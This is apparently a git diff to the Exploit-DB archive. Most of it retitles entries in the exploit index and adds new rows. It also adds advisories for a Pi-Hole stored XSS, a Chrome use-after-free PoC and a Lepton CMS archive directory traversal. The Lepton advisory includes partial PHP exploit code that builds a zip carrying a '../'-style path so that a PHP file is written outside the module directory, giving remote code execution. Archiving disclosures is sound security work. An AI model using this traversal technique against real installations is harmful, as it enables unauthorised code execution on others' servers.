diff --git a/files.csv b/files.csv
index acfa9fa77..046e7b2c4 100755
--- a/files.csv
+++ b/files.csv
@@ -1575,20 +1575,20 @@ id,file,description,date,author,platform,type,port
1864,platforms/php/webapps/1864.txt,"ashNews 0.83 - (pathtoashnews) Remote File Inclusion",2006-06-02,Kacper,php,webapps,0
1865,platforms/php/webapps/1865.txt,"Informium 0.12.0 - (common-menu.php) Remote File Inclusion",2006-06-02,Kacper,php,webapps,0
1866,platforms/php/webapps/1866.txt,"PHP-Nuke 7.9 Final (phpbb_root_path) Remote File Inclusions",2006-06-02,ddoshomo,php,webapps,0
-1867,platforms/multiple/dos/1867.html,"Mozilla Firefox 1.5.0.4 - (marquee) Denial of Service Exploit",2006-06-02,n00b,multiple,dos,0
+1867,platforms/multiple/dos/1867.html,"Mozilla Firefox 1.5.0.4 - (marquee) Denial of Service",2006-06-02,n00b,multiple,dos,0
1868,platforms/php/webapps/1868.php,"Pixelpost 1-5rc1-2 - Remote Privilege Escalation Exploit",2006-06-03,rgod,php,webapps,0
1869,platforms/php/webapps/1869.php,"DotClear 1.2.4 - (prepend.php) Arbitrary Remote Inclusion Exploit",2006-06-03,rgod,php,webapps,0
1870,platforms/php/webapps/1870.txt,"BlueShoes Framework 4.6 - Remote File Inclusion",2006-06-03,Kacper,php,webapps,0
1871,platforms/php/webapps/1871.txt,"WebspotBlogging 3.0.1 - (path) Remote File Inclusion",2006-06-03,Kacper,php,webapps,0
1872,platforms/php/webapps/1872.txt,"CS-Cart 1.3.3 - (classes_dir) Remote File Inclusion",2006-06-03,Kacper,php,webapps,0
1873,platforms/asp/webapps/1873.txt,"ProPublish 2.0 - (catid) SQL Injection",2006-06-03,FarhadKey,asp,webapps,0
-1874,platforms/php/webapps/1874.php,"LifeType 1.0.4 - SQL Injection / Admin Credentials Disclosure Exploit",2006-06-03,rgod,php,webapps,0
+1874,platforms/php/webapps/1874.php,"LifeType 1.0.4 - Multiple Vulnerabilities",2006-06-03,rgod,php,webapps,0
1875,platforms/php/webapps/1875.htm,"FunkBoard CF0.71 - (profile.php) Remote User Pass Change Exploit",2006-06-04,ajann,php,webapps,0
1876,platforms/php/webapps/1876.pl,"SCart 2.0 - (page) Remote Code Execution Exploit",2006-06-04,K-159,php,webapps,0
1877,platforms/php/webapps/1877.php,"Claroline 1.7.6 - (includePath) Remote Code Execution Exploit",2006-06-05,rgod,php,webapps,0
1878,platforms/php/webapps/1878.txt,"Particle Wiki 1.0.2 - SQL Injection",2006-06-05,FarhadKey,php,webapps,0
1879,platforms/php/webapps/1879.txt,"dotWidget CMS 1.0.6 - (file_path) Remote File Inclusion",2006-06-05,Aesthetico,php,webapps,0
-1880,platforms/linux/dos/1880.c,"Linux Kernel < 2.6.16.18 - (Netfilter NAT SNMP Module) Remote DoS Exploit",2006-06-05,"ECL Labs",linux,dos,0
+1880,platforms/linux/dos/1880.c,"Linux Kernel < 2.6.16.18 - (Netfilter NAT SNMP Module) Remote Denial of Service",2006-06-05,"ECL Labs",linux,dos,0
1881,platforms/php/webapps/1881.txt,"DreamAccount 3.1 - (da_path) Remote File Inclusion",2006-06-05,Aesthetico,php,webapps,0
1882,platforms/php/webapps/1882.pl,"Dmx Forum 2.1a (edit.php) Remote Password Disclosure Exploit",2006-06-05,DarkFig,php,webapps,0
1883,platforms/php/webapps/1883.txt,"Wikiwig 4.1 - (wk_lang.php) Remote File Inclusion",2006-06-06,Kacper,php,webapps,0
@@ -1598,13 +1598,13 @@ id,file,description,date,author,platform,type,port
1887,platforms/php/webapps/1887.txt,"Xtreme/Ditto News 1.0 - (post.php) Remote File Inclusion",2006-06-07,Kacper,php,webapps,0
1888,platforms/php/webapps/1888.txt,"Back-End CMS 0.7.2.1 - (jpcache.php) Remote Include",2006-06-08,"Federico Fazzi",php,webapps,0
1889,platforms/hardware/remote/1889.txt,"D-Link Access-Point 2.10na - (DWL Series) Config Disclosure",2006-06-08,INTRUDERS,hardware,remote,0
-1890,platforms/php/webapps/1890.txt,"cms-bandits 2.5 - (spaw_root) Remote File Inclusion",2006-06-08,"Federico Fazzi",php,webapps,0
-1891,platforms/php/webapps/1891.txt,"Enterprise Payroll Systems 1.1 - (footer) Remote Include",2006-06-08,Kacper,php,webapps,0
+1890,platforms/php/webapps/1890.txt,"CMS-Bandits 2.5 - (spaw_root) Remote File Inclusion",2006-06-08,"Federico Fazzi",php,webapps,0
+1891,platforms/php/webapps/1891.txt,"Enterprise Payroll Systems 1.1 - (footer) Remote File Inclusion",2006-06-08,Kacper,php,webapps,0
1892,platforms/php/webapps/1892.pl,"Guestex Guestbook 1.00 - (email) Remote Code Execution Exploit",2006-06-08,K-sPecial,php,webapps,0
1893,platforms/asp/webapps/1893.txt,"MailEnable Enterprise 2.0 - (ASP) Multiple Vulnerabilities",2006-06-09,"Soroush Dalili",asp,webapps,0
-1894,platforms/linux/dos/1894.py,"0verkill 0.16 - (ASCII-ART Game) Remote Integer Overflow Crash Exploit",2006-06-09,"Federico Fazzi",linux,dos,0
-1895,platforms/php/webapps/1895.txt,"empris r20020923 - (phormationdir) Remote Include",2006-06-10,Kacper,php,webapps,0
-1896,platforms/php/webapps/1896.txt,"aePartner 0.8.3 - (dir[data]) Remote Include",2006-06-10,Kacper,php,webapps,0
+1894,platforms/linux/dos/1894.py,"0verkill 0.16 - (ASCII-ART Game) Remote Integer Overflow Crash PoC",2006-06-09,"Federico Fazzi",linux,dos,0
+1895,platforms/php/webapps/1895.txt,"empris r20020923 - (phormationdir) Remote File Inclusion",2006-06-10,Kacper,php,webapps,0
+1896,platforms/php/webapps/1896.txt,"aePartner 0.8.3 - (dir[data]) Remote File Inclusion",2006-06-10,Kacper,php,webapps,0
1897,platforms/php/webapps/1897.txt,"phpOnDirectory 1.0 - Remote File Inclusion",2006-06-10,Kacper,php,webapps,0
1898,platforms/php/webapps/1898.txt,"WebprojectDB 0.1.3 - (INCDIR) Remote File Inclusion",2006-06-11,Kacper,php,webapps,0
1899,platforms/php/webapps/1899.txt,"free QBoard 1.1 - (qb_path) Remote File Inclusion",2006-06-11,Kacper,php,webapps,0
@@ -1644,8 +1644,8 @@ id,file,description,date,author,platform,type,port
1933,platforms/php/webapps/1933.txt,"BandSite CMS 1.1.1 - (root_path) Remote File Inclusion",2006-06-20,Kw3[R]Ln,php,webapps,0
1934,platforms/php/webapps/1934.txt,"dotProject 2.0.3 - (baseDir) Remote File Inclusion",2006-06-20,h4ntu,php,webapps,0
1935,platforms/windows/dos/1935.cpp,"Winamp 5.21 - (Midi File Header Handling) Buffer Overflow PoC",2006-06-20,BassReFLeX,windows,dos,0
-1936,platforms/php/webapps/1936.txt,"SmartSiteCMS 1.0 - (root) Remote File Inclusion",2006-06-20,Archit3ct,php,webapps,0
-1937,platforms/multiple/dos/1937.html,"Opera 9 - (long href) Remote Denial of Service Exploit",2006-06-21,N9,multiple,dos,0
+1936,platforms/php/webapps/1936.txt,"SmartSite CMS 1.0 - (root) Remote File Inclusion",2006-06-20,Archit3ct,php,webapps,0
+1937,platforms/multiple/dos/1937.html,"Opera 9 - (long href) Remote Denial of Service",2006-06-21,N9,multiple,dos,0
1938,platforms/php/webapps/1938.pl,"DataLife Engine 4.1 - SQL Injection Exploit (perl)",2006-06-21,RusH,php,webapps,0
1939,platforms/php/webapps/1939.php,"DataLife Engine 4.1 - SQL Injection Exploit (PHP)",2006-06-21,RusH,php,webapps,0
1940,platforms/windows/remote/1940.pm,"Microsoft Windows RRAS - Remote Stack Overflow Exploit (MS06-025) (Metasploit)",2006-06-22,"H D Moore",windows,remote,445
@@ -1653,9 +1653,9 @@ id,file,description,date,author,platform,type,port
1942,platforms/php/webapps/1942.txt,"ralf image gallery 0.7.4 - Multiple Vulnerabilities",2006-06-22,Aesthetico,php,webapps,0
1943,platforms/php/webapps/1943.txt,"Harpia CMS 1.0.5 - Remote File Inclusion",2006-06-22,Kw3[R]Ln,php,webapps,0
1944,platforms/windows/local/1944.c,"Microsoft Excel Unspecified Remote Code Execution Exploit",2006-06-22,"naveed afzal",windows,local,0
-1945,platforms/php/webapps/1945.pl,"w-Agora 4.2.0 - (inc_dir) Remote File Inclusion Exploit",2006-06-22,the_day,php,webapps,0
+1945,platforms/php/webapps/1945.pl,"w-Agora 4.2.0 - (inc_dir) Remote File Inclusion",2006-06-22,the_day,php,webapps,0
1946,platforms/php/webapps/1946.php,"Jaws 0.6.2 - (Search gadget) SQL Injection Exploit",2006-06-23,rgod,php,webapps,0
-1947,platforms/multiple/dos/1947.c,"BitchX 1.1-final do_hook() Remote Denial of Service Exploit",2006-06-24,"Federico L. Bossi Bonin",multiple,dos,0
+1947,platforms/multiple/dos/1947.c,"BitchX 1.1-final - do_hook() Remote Denial of Service",2006-06-24,"Federico L. Bossi Bonin",multiple,dos,0
1948,platforms/php/webapps/1948.txt,"phpMySms 2.0 - (ROOT_PATH) Remote File Inclusion",2006-06-24,Persian-Defacer,php,webapps,0
1949,platforms/windows/dos/1949.pl,"XM Easy Personal FTP Server 5.0.1 - (Port) Remote Overflow PoC",2006-06-24,"Jerome Athias",windows,dos,0
1950,platforms/php/webapps/1950.pl,"MyBulletinBoard (MyBB) 1.1.3 - (usercp.php) Create Admin Exploit",2006-06-25,Hessam-x,php,webapps,0
@@ -1668,7 +1668,7 @@ id,file,description,date,author,platform,type,port
1957,platforms/php/webapps/1957.pl,"Scout Portal Toolkit 1.4.0 - (forumid) SQL Injection Exploit",2006-06-27,simo64,php,webapps,0
1958,platforms/windows/local/1958.pl,"Microsoft Excel 2003 Hlink Stack/SEH Buffer Overflow Exploit",2006-06-27,FistFuXXer,windows,local,0
1959,platforms/php/webapps/1959.txt,"RsGallery2 <= 1.11.2 - (rsgallery.html.php) File Include",2006-06-28,marriottvn,php,webapps,0
-1960,platforms/php/webapps/1960.php,"BLOG:CMS 4.0.0k SQL Injection Exploit",2006-06-28,rgod,php,webapps,0
+1960,platforms/php/webapps/1960.php,"BLOG:CMS 4.0.0k - SQL Injection",2006-06-28,rgod,php,webapps,0
1961,platforms/php/webapps/1961.txt,"XOOPS myAds Module (lid) SQL Injection",2006-06-28,KeyCoder,php,webapps,0
1962,platforms/osx/local/1962.pl,"Mac OS X 10.4.6 - (launchd) Local Format String Exploit (x86)",2006-06-28,"Kevin Finisterre",osx,local,0
1963,platforms/php/webapps/1963.txt,"GeekLog 1.4.0sr3 - (_CONF[path]) Remote File Inclusion",2006-06-29,Kw3[R]Ln,php,webapps,0
@@ -3739,7 +3739,7 @@ id,file,description,date,author,platform,type,port
4087,platforms/linux/remote/4087.c,"BitchX 1.1-final (EXEC) Remote Command Execution Exploit",2007-06-21,clarity_,linux,remote,0
4089,platforms/php/webapps/4089.pl,"SerWeb 0.9.4 - (load_lang.php) Remote File Inclusion Exploit",2007-06-21,Kw3[R]Ln,php,webapps,0
4090,platforms/php/webapps/4090.pl,"Powl 0.94 - (htmledit.php) Remote File Inclusion",2007-06-22,Kw3[R]Ln,php,webapps,0
-4091,platforms/php/webapps/4091.txt,"Sun Board 1.00.00 alpha Remote File Inclusion",2007-06-22,GoLd_M,php,webapps,0
+4091,platforms/php/webapps/4091.txt,"Sun Board 1.00.00 alpha - Remote File Inclusion",2007-06-22,GoLd_M,php,webapps,0
4092,platforms/php/webapps/4092.txt,"netclassifieds - (SQL/XSS/full path) Multiple Vulnerabilities",2007-06-22,"laurent gaffié ",php,webapps,0
4093,platforms/multiple/remote/4093.pl,"Apache mod_jk 1.2.19/1.2.20 - Remote Buffer Overflow Exploit",2007-06-22,eliteboy,multiple,remote,80
4094,platforms/windows/remote/4094.html,"BarCode ActiveX Control BarCodeAx.dll 4.9 - Remote Overflow Exploit",2007-06-22,callAX,windows,remote,0
@@ -7528,7 +7528,7 @@ id,file,description,date,author,platform,type,port
7998,platforms/php/webapps/7998.txt,"WikkiTikkiTavi 1.11 - Remote PHP File Upload",2009-02-06,ByALBAYX,php,webapps,0
7999,platforms/php/webapps/7999.pl,"Simple PHP News 1.0 - Remote Command Execution Exploit",2009-02-06,Osirys,php,webapps,0
8000,platforms/php/webapps/8000.txt,"Zeroboard4 pl8 (07.12.17) - Multiple Vulnerabilities",2009-02-06,make0day,php,webapps,0
-8001,platforms/php/webapps/8001.txt,"Mailist 3.0 Insecure Backup/Local File Inclusion",2009-02-06,SirGod,php,webapps,0
+8001,platforms/php/webapps/8001.txt,"Mailist 3.0 - Insecure Backup/Local File Inclusion",2009-02-06,SirGod,php,webapps,0
8002,platforms/php/webapps/8002.txt,"CafeEngine - (index.php catid) SQL Injection",2009-02-06,SuNHouSe2,php,webapps,0
8003,platforms/php/webapps/8003.pl,"1024 CMS 1.4.4 - Remote Command Execution with RFI (c99) Exploit",2009-02-06,JosS,php,webapps,0
8004,platforms/php/webapps/8004.txt,"SilverNews 2.04 - (Auth Bypass/LFI/RCE) Multiple Vulnerabilities",2009-02-06,x0r,php,webapps,0
@@ -12348,7 +12348,7 @@ id,file,description,date,author,platform,type,port
14013,platforms/windows/remote/14013.txt,"UFO: Alien Invasion 2.2.1 - Remote Arbitrary Code Execution",2010-06-24,"Jason Geffner",windows,remote,0
14014,platforms/win_x86/shellcode/14014.pl,"Windows XP SP3 SPA - URLDownloadToFileA + CreateProcessA + ExitProcess shellcode (176+ bytes)",2010-06-24,d0lc3,win_x86,shellcode,0
14015,platforms/php/webapps/14015.txt,"2DayBiz photo sharing Script - SQL Injection",2010-06-24,JaMbA,php,webapps,0
-14016,platforms/php/webapps/14016.txt,"AdaptCMS 2.0.0 Beta (init.php) Remote File Inclusion",2010-06-24,v3n0m,php,webapps,0
+14016,platforms/php/webapps/14016.txt,"AdaptCMS 2.0.0 Beta - (init.php) Remote File Inclusion",2010-06-24,v3n0m,php,webapps,0
14017,platforms/php/webapps/14017.txt,"Joomla Component com_realtyna - LFI",2010-06-24,MISTERFRIBO,php,webapps,0
14018,platforms/php/webapps/14018.txt,"2DayBiz Video Community Portal - 'user-profile.php' SQL Injection",2010-06-24,Sangteamtham,php,webapps,0
14019,platforms/php/webapps/14019.txt,"2DayBiz Real Estate Portal - 'viewpropertydetails.php' SQL injection",2010-06-24,Sangteamtham,php,webapps,0
@@ -20898,8 +20898,8 @@ id,file,description,date,author,platform,type,port
23680,platforms/php/webapps/23680.php,"PHP-Nuke 6.x - Category Parameter SQL Injection",2003-12-23,pokleyzz,php,webapps,0
23681,platforms/windows/dos/23681.pl,"EvolutionX Multiple Remote Buffer Overflow Vulnerabilities",2004-02-10,Moth7,windows,dos,0
23682,platforms/linux/local/23682.c,"XFree86 4.3 Font Information File Buffer Overflow",2004-11-10,bender2@lonestar.org,linux,local,0
-23683,platforms/php/webapps/23683.txt,"VisualShapers ezContents 1.x/2.0 db.php Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",php,webapps,0
-23684,platforms/php/webapps/23684.txt,"VisualShapers ezContents 1.x/2.0 archivednews.php Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",php,webapps,0
+23683,platforms/php/webapps/23683.txt,"VisualShapers ezContents 1.x/2.0 - db.php Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",php,webapps,0
+23684,platforms/php/webapps/23684.txt,"VisualShapers ezContents 1.x/2.0 - archivednews.php Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",php,webapps,0
23685,platforms/php/webapps/23685.txt,"BosDev BosDates 3.x - SQL Injection",2004-02-11,G00db0y,php,webapps,0
23696,platforms/asp/webapps/23696.pl,"ASP Portal - Multiple Vulnerabilities",2004-02-01,"Manuel Lopez",asp,webapps,0
23697,platforms/php/webapps/23697.txt,"AllMyGuests 0.x - info.inc.php Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0
@@ -22367,7 +22367,7 @@ id,file,description,date,author,platform,type,port
25223,platforms/php/webapps/25223.txt,"Phorum 5.0.14 - Multiple Subject and Attachment HTML Injection Vulnerabilities",2005-03-14,"Jon Oberheide",php,webapps,0
25224,platforms/php/webapps/25224.txt,"SimpGB 1.0 Guestbook.php SQL Injection",2005-03-14,visus,php,webapps,0
25225,platforms/php/webapps/25225.txt,"PHPAdsNew 2.0.4 AdFrame.php Cross-Site Scripting",2005-03-14,"Maksymilian Arciemowicz",php,webapps,0
-25226,platforms/php/webapps/25226.txt,"VoteBox 2.0 Votebox.php Remote File Inclusion",2005-03-14,SmOk3,php,webapps,0
+25226,platforms/php/webapps/25226.txt,"VoteBox 2.0 - Votebox.php Remote File Inclusion",2005-03-14,SmOk3,php,webapps,0
25227,platforms/php/webapps/25227.txt,"PHPOpenChat 2.3.4/3.0.1 PoC_loginform.php phpbb_root_path Parameter Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0
25228,platforms/php/webapps/25228.txt,"PHPOpenChat 2.3.4/3.0.1 PoC.php Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0
25229,platforms/php/webapps/25229.txt,"PHPOpenChat 2.3.4/3.0.1 ENGLISH_poc.php Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0
@@ -22384,7 +22384,7 @@ id,file,description,date,author,platform,type,port
25240,platforms/php/webapps/25240.txt,"CoolForum 0.5/0.7/0.8 register.php login Parameter SQL Injection",2005-03-19,Romano,php,webapps,0
25241,platforms/php/webapps/25241.html,"PHP-Fusion 4/5 Setuser.php HTML Injection",2005-03-19,"PersianHacker Team",php,webapps,0
25242,platforms/php/webapps/25242.txt,"Ciamos 0.9.2 Highlight.php File Disclosure",2005-03-19,"Majid NT",php,webapps,0
-25243,platforms/php/webapps/25243.txt,"TRG News 3.0 Script Remote File Inclusion",2005-03-21,Frank_Reiner,php,webapps,0
+25243,platforms/php/webapps/25243.txt,"TRG News 3.0 Script - Remote File Inclusion",2005-03-21,Frank_Reiner,php,webapps,0
25244,platforms/php/webapps/25244.txt,"CzarNews 1.13/1.14 headlines.php Remote File Inclusion",2005-03-21,brOmstar,php,webapps,0
25245,platforms/php/webapps/25245.txt,"Social Site Generator 2.2 - CSRF Add Admin Exploit",2013-05-06,Fallaga,php,webapps,0
25247,platforms/php/webapps/25247.txt,"Craigslist Gold - SQL Injection",2013-05-06,Fallaga,php,webapps,0
@@ -22401,7 +22401,7 @@ id,file,description,date,author,platform,type,port
25258,platforms/php/webapps/25258.txt,"Phorum 3.x/5.0.x - HTTP Response Splitting",2005-03-22,"Alexander Anisimov",php,webapps,0
25259,platforms/windows/dos/25259.py,"Microsoft Windows XP Local Denial of Service",2005-03-22,liquid@cyberspace.org,windows,dos,0
25260,platforms/php/webapps/25260.txt,"Vortex Portal 2.0 - index.php act Parameter Remote File Inclusion",2005-03-23,"Francisco Alisson",php,webapps,0
-25261,platforms/php/webapps/25261.txt,"Vortex Portal 2.0 content.php act Parameter Remote File Inclusion",2005-03-23,"Francisco Alisson",php,webapps,0
+25261,platforms/php/webapps/25261.txt,"Vortex Portal 2.0 - content.php act Parameter Remote File Inclusion",2005-03-23,"Francisco Alisson",php,webapps,0
25262,platforms/php/webapps/25262.txt,"InterSpire ArticleLive 2005 NewComment Cross-Site Scripting",2005-03-23,mircia,php,webapps,0
25263,platforms/php/webapps/25263.txt,"DigitalHive 2.0 msg.php XSS",2005-03-23,"benji lemien",php,webapps,0
25264,platforms/php/webapps/25264.txt,"DigitalHive 2.0 membres.php mt Parameter XSS",2005-03-23,"benji lemien",php,webapps,0
@@ -27370,7 +27370,7 @@ id,file,description,date,author,platform,type,port
30476,platforms/ios/webapps/30476.txt,"Song Exporter 2.1.1 RS iOS - Local File Inclusion",2013-12-24,Vulnerability-Lab,ios,webapps,80
30477,platforms/windows/local/30477.txt,"Huawei Technologies du Mobile Broadband 16.0 - Local Privilege Escalation",2013-12-24,LiquidWorm,windows,local,0
30478,platforms/php/webapps/30478.txt,"php MBB CMS 004 - Multiple Vulnerabilities",2013-12-24,"cr4wl3r ",php,webapps,80
-30479,platforms/php/webapps/30479.txt,"Shoutbox 1.0 Shoutbox.php Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0
+30479,platforms/php/webapps/30479.txt,"Shoutbox 1.0 - Shoutbox.php Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0
30480,platforms/php/webapps/30480.txt,"Bilder Galerie 1.0 - Index.php Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0
30481,platforms/php/webapps/30481.txt,"Web News 1.1 - index.php config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0
30482,platforms/php/webapps/30482.txt,"Web News 1.1 - feed.php config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0
@@ -33637,7 +33637,7 @@ id,file,description,date,author,platform,type,port
37307,platforms/php/webapps/37307.txt,"phphq.Net phAlbum 1.5.1 - 'index.php' Cross-Site Scripting",2012-05-21,"Eyup CELIK",php,webapps,0
37308,platforms/php/webapps/37308.txt,"RuubikCMS 1.1.x - Cross-Site Scripting / Information Disclosure / Directory Traversal",2012-05-23,AkaStep,php,webapps,0
37309,platforms/php/webapps/37309.txt,"phpCollab 2.5 - Database Backup Information Disclosure",2012-05-23,"team ' and 1=1--",php,webapps,0
-37310,platforms/php/webapps/37310.txt,"Ajaxmint Gallery 1.0 Local File Inclusion",2012-05-23,AkaStep,php,webapps,0
+37310,platforms/php/webapps/37310.txt,"Ajaxmint Gallery 1.0 - Local File Inclusion",2012-05-23,AkaStep,php,webapps,0
37311,platforms/php/webapps/37311.txt,"Pligg CMS 1.x - module.php Multiple Parameter XSS",2012-05-23,"High-Tech Bridge SA",php,webapps,0
37312,platforms/php/webapps/37312.txt,"pragmaMx 1.12.1 modules.php URI XSS",2012-05-23,"High-Tech Bridge SA",php,webapps,0
37313,platforms/php/webapps/37313.txt,"pragmaMx 1.12.1 includes/wysiwyg/spaw/editor/plugins/imgpopup/img_popup.php img_url Parameter XSS",2012-05-23,"High-Tech Bridge SA",php,webapps,0
@@ -36386,9 +36386,19 @@ id,file,description,date,author,platform,type,port
40234,platforms/windows/remote/40234.py,"Easy FTP Server 1.7.0.11 - 'APPE' Command Buffer Overflow Remote Exploit",2012-03-03,Swappage,windows,remote,0
40235,platforms/hardware/remote/40235.py,"Samsung Smart Home Camera SNH-P-6410 - Command Injection",2016-08-14,PentestPartners,hardware,remote,0
40236,platforms/ruby/webapps/40236.txt,"GitLab - 'impersonate' Feature Privilege Escalation",2016-08-15,Kaimi,ruby,webapps,80
-40237,platforms/php/webapps/40237.txt,"Zabbix 2.2.x_ 3.0.x - SQL Injection",2016-08-15,1n3,php,webapps,0
-40238,platforms/multiple/dos/40238.txt,"Microsoft Office Word 2013_2016 - sprmSdyaTop Denial of Service (MS16-099)",2016-08-16,COSIG,multiple,dos,0
+40237,platforms/php/webapps/40237.txt,"Zabbix 2.2.x / 3.0.x - SQL Injection",2016-08-15,1n3,php,webapps,0
+40238,platforms/multiple/dos/40238.txt,"Microsoft Office Word 2013/2016 - sprmSdyaTop Denial of Service (MS16-099)",2016-08-16,COSIG,multiple,dos,0
40239,platforms/jsp/webapps/40239.txt,"WSO2 Identity Server 5.1.0 - Multiple Vulnerabilities",2016-08-16,hyp3rlinx,jsp,webapps,0
40240,platforms/jsp/webapps/40240.txt,"WSO2 Carbon 4.4.5 - Local File Inclusion",2016-08-16,hyp3rlinx,jsp,webapps,9443
40241,platforms/jsp/webapps/40241.txt,"WSO2 Carbon 4.4.5 - Stored XSS",2016-08-16,hyp3rlinx,jsp,webapps,9443
40242,platforms/jsp/webapps/40242.txt,"WSO2 Carbon 4.4.5 - (Denial of Service) CSRF",2016-08-16,hyp3rlinx,jsp,webapps,9443
+40243,platforms/osx/dos/40243.html,"Google Chrome 26.0.1410.43 (Webkit) - OBJECT Element Use After Free PoC",2013-04-04,"Google Security Research",osx,dos,0
+40245,platforms/win_x86/shellcode/40245.c,"Windows x86 - MessageBoxA Shellcode (242 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
+40246,platforms/win_x86/shellcode/40246.c,"Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
+40247,platforms/php/webapps/40247.txt,"Lepton CMS 2.2.0 / 2.2.1 - Directory Traversal",2016-08-16,hyp3rlinx,php,webapps,80
+40248,platforms/php/webapps/40248.txt,"Lepton CMS 2.2.0 / 2.2.1 - PHP Code Injection",2016-08-16,hyp3rlinx,php,webapps,80
+40249,platforms/linux/webapps/40249.txt,"Pi-Hole Web Interface 2.8.1 - Stored XSS in Whitelist/Blacklist",2016-08-16,loneferret,linux,webapps,0
+40250,platforms/php/webapps/40250.txt,"Nagios Log Server 1.4.1 - Multiple Vulnerabilities",2016-08-16,Security-Assessment.com,php,webapps,0
+40251,platforms/php/webapps/40251.txt,"Nagios Network Analyzer 2.2.0 - Multiple Vulnerabilities",2016-08-16,Security-Assessment.com,php,webapps,0
+40252,platforms/php/webapps/40252.txt,"Nagios Incident Manager 2.0.0 - Multiple Vulnerabilities",2016-08-16,Security-Assessment.com,php,webapps,0
+40253,platforms/windows/dos/40253.html,"Internet Explorer - MSHTML!CMultiReadStreamLifetimeManager::ReleaseThreadStateInternal Read AV",2016-08-16,"Google Security Research",windows,dos,0
diff --git a/platforms/linux/webapps/40249.txt b/platforms/linux/webapps/40249.txt
new file mode 100755
index 000000000..3d957dd13
--- /dev/null
+++ b/platforms/linux/webapps/40249.txt
@@ -0,0 +1,50 @@
+# Exploit Title: Pi-Hole Web Interface Stored XSS in White/Black list file
+# Author: loneferret from Kioptrix
+# Product: Pi-Hole
+# Version: Web Interface 1.3
+# Web Interface software: https://github.com/pi-hole/AdminLTE
+# Version: Pi-Hole v2.8.1
+# Discovery date: July 20th 2016
+# Vendor Site: https://pi-hole.net
+# Software Download: https://github.com/pi-hole/pi-hole
+# Tested on: Ubuntu 14.04
+# Solution: Update to next version.
+
+# Software description:
+# The Pi-hole is an advertising-aware DNS/Web server. If an ad domain is queried,
+# a small Web page or GIF is delivered in place of the advertisement.
+# You can also replace ads with any image you want since it is just a simple
+# Webpage taking place of the ads.
+
+# Note: Not much of a vulnerability, implies you already have access
+# to the box to begin with. Still best to use good coding practices,
+# and avoid such things.
+
+# Vulnerability PoC: Stored XSS
+# Insert this:
+#
+# In either /etc/pihole/blacklist.txt || /etc/pihole/whitelist.txt
+#
+# Then navigate to:
+# http://pi-hole-server/admin/list.php?l=white
+# or
+# http://pi-hole-server/admin/list.php?l=black
+#
+# And a pop-up will appear.
+
+# Disclosure timeline:
+# July 20th 2016: Sent initial email to author.
+# July 21st 2016: Response, bug has been forwarded to web dev people
+# July 22nd 2016: Asked to be kept up to date on fix
+# July 27th 2016: Author replied saying he shall
+# July 28th 2016: - Today I had chocolat milk -
+# August 3rd 2016: Reply saying there's a fix, waiting on "Mark" to confirm
+# August 3rd 2106: Supplies URL to fix from Github https://github.com/pi-hole/AdminLTE/pull/120
+# August 4th 2016: Thanked him for fix, informed him of a lame LFI in the web interface as well.
+# August 4th 2016: - While drinking my coffee, I realize my comments are longer than the actual PoC. -
+# August 10th 2016: Still nothing
+# August 12th 2016: Submitting this is taking too much time to integrate their fix
+
+--
+Notice: This email does not mean I'm consenting to receiving promotional
+emails/spam/etc. Remember Canada has laws.
diff --git a/platforms/osx/dos/40243.html b/platforms/osx/dos/40243.html
new file mode 100755
index 000000000..47b556da7
--- /dev/null
+++ b/platforms/osx/dos/40243.html
@@ -0,0 +1,104 @@
+#---object-beforeload-chrome.html---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#
+
+
+
+
+
+
+
+
+#----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#
+
+
+
+
+
+#---object-beforeload-frame-chrome.html------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#
+
+
+
+
+
+
+#----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#
+
+## E-DB Note: Source ~ https://bugs.chromium.org/p/chromium/issues/detail?id=226696
\ No newline at end of file
diff --git a/platforms/php/webapps/40247.txt b/platforms/php/webapps/40247.txt
new file mode 100755
index 000000000..ab6111234
--- /dev/null
+++ b/platforms/php/webapps/40247.txt
@@ -0,0 +1,98 @@
+[+] Credits: John Page (HYP3RLINX)
+
+[+] Website: hyp3rlinx.altervista.org
+
+[+] Source: http://hyp3rlinx.altervista.org/advisories/LEPTON-ARCHIVE-DIRECTORY-TRAVERSAL.txt
+
+[+] ISR: ApparitionSec
+
+
+Vendor:
+==================
+www.lepton-cms.org
+
+
+Product:
+=================================
+Lepton CMS 2.2.0 / 2.2.1 (update)
+
+LEPTON is an easy-to-use but full customizable Content Management System (CMS).
+
+
+Vulnerability Type:
+============================
+Archive Directory Traversal
+
+
+CVE Reference:
+==============
+N/A
+
+
+Vulnerability Details:
+=====================
+
+Lepton has feature that lets users install new modules, if malicious user uploads an archive and the module is not valid it
+will generate an error. However, the malicious archive will still get decompressed and no check is made for ../ characters in
+the file name allowing in arbitrary PHP files to be placed outside the intended target directory for installed modules. This can
+then be used to execute remote commands on the affected host system.
+
+e.g.
+
+We get error message as below.
+
+under "Add Ons" tab Install Module.
+Invalid LEPTON installation file. Please check the *.zip format.[1]
+
+Archive still gets decompressed and the malicious file is moved outside of the intended target directory, by using ../ in file name.
+
+
+Exploit code(s):
+===============
+
+";exit();}
+$file_name=$argv[1];
+
+$zip = new ZipArchive();
+$res = $zip->open("$file_name.zip", ZipArchive::CREATE);
+$zip->addFromString("..\..\..\..\..\..\..\..\RCE.php", '');
+$zip->close();
+
+echo "Malicious archive created...\r\n";
+echo "========= hyp3rlinx ============";
+?>
+
+
+Disclosure Timeline:
+===========================================================
+Attempted Vendor Notification: June 11, 2016 (No replies)
